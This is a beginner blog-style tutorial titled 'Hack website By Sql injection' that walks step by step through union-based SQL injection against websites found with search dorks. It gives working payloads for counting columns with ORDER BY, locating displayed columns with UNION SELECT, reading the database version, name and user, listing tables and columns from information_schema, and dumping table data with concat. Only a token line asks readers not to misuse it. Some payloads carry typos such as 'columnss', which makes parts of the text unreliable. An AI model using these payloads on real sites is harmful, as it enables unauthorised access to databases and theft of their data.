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Hack website By Sql injection For Begginer

Dipak Kumar Das

Hi friends today I will show you sqli injection tutorial step by step for beginners only

For this you need a vulnerable site. Here for your practice I am giving you a vulnerable site link but in my tutorial I am taking an example 
Let us take an example: http: //
There are many dorks available to find sqli vulnerable sites better you make your own dork.
Now we have to check that this site is vulnerable to sqli or not for that simply add an asterisk (‘) at the end of the link
Example: http: //’
If u got this error below then this site is vulnerable to sqli
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
Now the real thing start
Now we have to find the number of columns
Follow below steps order by 1 --+    (no error) order by 2 --+   (no error) order by 3 --+   (no error) order by 4 --+   (no error) order by 5 --+    (error i.e Unknown column '5' in 'order clause’)
That means there are 4 columns

Now we have to find the vulnerable column 
To find the vulnerable column where we have to inject
Follow the procedure
Example: union all select 1,2,3,4 --+
Now check there is a some number 1, 2, 3 or 4 is displaying on the webpage like the below picture

Obtaining database version: it is very easy on simple sqli site just replace the vulnerable columns.
Here 2 and 3 are vulnerable and u can choose any one column to inject.
Here I am selecting 3 and
Check the example how you can obtain the database version
Example: union all select 1,2,version(),4 --+
Here use can also use “@@version” in place of  “version() “
And obtaing database name and user same as version just replace version() ith database() for database and replace version() with user() for  batabase user

Now we have to retrive the database
We have to find the table name from database
For table names we have to write the query like below example
Example: union all select 1,2,table_name,4  from information_schema.tables where table_schema=database() --+
Or you can replace database() with db name with single qoute ex: ‘mydatabase’
Now we have to find the columns name of tables available in database
Example: union all select 1,2,column_name,4  from information_schema.columnss where table_name=’xyz’ --+
You have to replace the xyz with the table name you want to retrive column name
Now last step if u want to retrive data from a table write the query like this
Example: union all select
1,2,concat(0x3a,colum nname,0x3a,colum nname),4  from tablename --+
Here replace column name and table name  according to your database
Here is a vulnerable site link for practice don’t miss use it
Vulnerable link:

hope you like the post

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